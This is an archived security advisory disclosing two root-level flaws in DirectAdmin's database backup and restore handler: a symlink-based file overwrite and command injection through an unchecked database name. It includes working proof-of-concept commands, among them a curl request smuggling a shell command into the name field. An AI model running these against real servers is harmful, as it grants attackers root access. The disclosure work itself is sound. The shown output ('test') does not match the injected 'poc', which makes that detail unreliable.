DirectAdmin Local File Overwrite

2009-04-22T00:00:00
ID PACKETSTORM:76908
Type packetstorm
Reporter anonymous
Modified 2009-04-22T00:00:00

Description

                                        
                                            `Subject: DirectAdmin < 1.33.4 Local file overwrite & Local root escalation  
  
Author: Anonymous  
ReleaseID: d8253f15e447935c24ab38a215735931942a77717d7b55d84200d070d1e54d3b  
Date: 22-04-2009  
  
The issue on http://www.directadmin.com/features.php?id=968 is larger than  
the wording would indicate.  
  
It fixes two issues in /CMD_DB.  
  
--- Local file overwrite ---  
  
action=backup runs a mysqldump as root and generates a predictable temporary  
file in the temporary directory defined as tmpdir in  
/usr/local/directadmin/conf: "$tmpdir/${dbname}.gz".  
It does not check if the file exists before piping the output of "mysqldump  
| gzip" into it, allowing any DA user to create or overwrite any file on the  
server as root.  
  
PoC:  
  
On server: $ ln -s /etc/poc /home/tmp/database_name.gz  
On client: $ curl http://directadminserver:2222/CMD_DB/database_name.gz  
On server:  
$ ls -la /etc/poc  
-rw-r--r-- 1 root root 514 Apr 22 09:05 /etc/poc  
$ zcat /etc/poc | head -1  
-- MySQL dump 10.9  
  
--- Local root escalation ---  
  
action=restore runs a "gunzip | mysql $dbname" as root, with $dbname being  
unchecked, allowing any DA user to run any code as root.  
  
PoC:  
  
On client: curl -n -F action=restore -F domain=poc.com -F  
'file1=@database.gz' -F method=default -F 'name=poc_db;echo poc > /etc/poc'  
http://directadminserver:2222/CMD_DB  
On server:  
$ ls -la /etc/poc  
-rw-r--r-- 1 root root 5 Apr 22 10:30 /etc/poc  
$ cat /etc/poc  
test  
  
--   
Anonymous  
`